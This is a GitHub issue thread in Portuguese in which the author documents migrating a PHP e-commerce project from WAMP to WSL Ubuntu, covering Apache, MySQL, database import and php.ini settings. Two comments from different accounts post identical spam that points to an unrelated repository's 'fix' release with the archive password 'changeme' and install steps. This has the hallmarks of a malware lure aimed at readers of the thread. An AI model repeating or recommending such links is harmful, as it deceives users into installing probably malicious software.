### ISSUE TITLE
Migrar projeto do WAMP SERVER para o WLS Linux

### ISSUE THREAD

**Issue by AlexPedro105** [AlexPedro105/eCommerce#11]
Irei migrar meu projeto do WAMP Server para WSL Linux. (Isso é opcional)
Passos a serem utilizados:
Primeiro Passo - Abra o power shell do windows e execute o comando para instalar o WLS:
**wls --install**

Escolha uma distribuição linux (no meu caso, escolherei ubuntu 22)

Após a instalação e dentro do WLS, atualize as dependências
**sudo apt update
sudo apt upgrade**

Segundo Passo - Instalar o Apache, PHP, MySql no WLS.
Apache: **sudo apt install apache2**
PHP 8.1: **sudo apt install php8.1 libapache2-mod-php8.1**
Mysql: **sudo apt install mysql-server**

Verifique se estão rodando:
**sudo service apache2 start
sudo service mysql start**

Terceiro Passo - Migrar banco de dados.
Copie o arquivo SQL para o WSL:
**cp /mnt/c/caminho/para/arquivo.sql ~/**

Acesse o MySQL no WSL e crie um novo banco de dados:
**mysql -u root -p**

Criar o banco de dados:
**CREATE DATABASE nome_do_banco;**

Importe o arquivo SQL:
**mysql -u root -p nome_do_banco < arquivo.sql**

Quarto passo - Migrar o Projeto PHP
Copie os arquivos do projeto do WAMP para o WSL:
**cp -r /mnt/c/caminho/para/projeto /var/www/html/**

Ajuste as permissões para o diretório do projeto:
**sudo chown -R www-data:www-data /var/www/html/projeto
sudo chmod -R 755 /var/www/html/projeto**

Acesse o projeto no navegador usando o IP ou o domínio configurado no Apache, por exemplo:
http://localhost/projeto

Quinto passo - Ajustar Configurações e Depurar
**sudo tail -f /var/log/apache2/error.log**

Configuração do php.ini

Parte 1 - Localizar o Arquivo php.ini
No WSL/Ubuntu (Linux): /etc/php/<versão>/apache2/php.ini
Para confirmar o caminho exato do php.ini que está em uso:
php -i | grep "Loaded Configuration File"

Parte 2 - Editar o Arquivo php.ini
No Linux (usando nano):
**sudo nano /etc/php/<versão>/apache2/php.ini**

Configurações Comuns para Editar
Exibição de Erros:
**display_errors = On**

Tamanho Máximo de Upload de Arquivo:
**upload_max_filesize = 20M
post_max_size = 20M**

Tempo Máximo de Execução de Scripts:
**max_execution_time = 30**

Fuso Horário:
**date.timezone = "America/Sao_Paulo"**

Limite de Memória:
**memory_limit = 256M**

Parte 3 -  Reinicie o Servidor Web
**sudo service apache2 restart**

Parte 4 - Verifique as Configurações
No diretório raiz do seu servidor (por exemplo, /var/www/html), crie um arquivo info.php:
**<?php phpinfo(); ?>**

Abra o navegador e vá para:
http://localhost/info.php

Parte 5 - (Opcional) Fazer Backup do php.iniAntes de fazer grandes alterações, é recomendável criar um backup do php.ini para que você possa restaurá-lo em caso de problemas.
**sudo cp /etc/php/<versão>/apache2/php.ini /etc/php/<versão>/apache2/php.ini.backup**

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AlexPedro105** [comment]
Feito os passos, meu sistema atualmente só utiliza o WSL, o interessante é lembrar de configurar as permissões de pastas e o git.
